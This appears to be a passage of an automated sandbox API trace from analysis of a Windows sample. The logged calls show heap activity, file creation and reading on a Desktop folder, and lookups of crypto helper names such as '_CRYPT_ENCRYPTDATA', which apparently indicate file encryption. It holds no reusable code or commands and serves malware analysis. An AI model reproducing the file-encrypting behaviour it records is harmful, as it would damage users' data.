RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d730 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x699838 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0075.146] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd")) returned 0x10 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bqtv.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.147] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1070 [0075.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1070 | out: hHeap=0x650000) returned 1 [0075.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0075.148] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0075.148] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0075.148] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100000) returned 0x32b0020 [0075.148] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.149] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x44c1, lpOverlapped=0x0) returned 1 [0075.150] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44c1) returned 0x6a1070 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44c1) returned 0x6a5540 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1070 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.151] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44c1) returned 0x6a1070 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1070 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.151] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0075.151] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.152] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3c8 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44c1) returned 0x6a1070 [0075.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb468 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb558 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3b8 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76dfd0 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44c1) returned 0x795ff8 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.154] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0075.154] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.154] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb608 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e2e8 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.155] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.155] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.156] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.156] 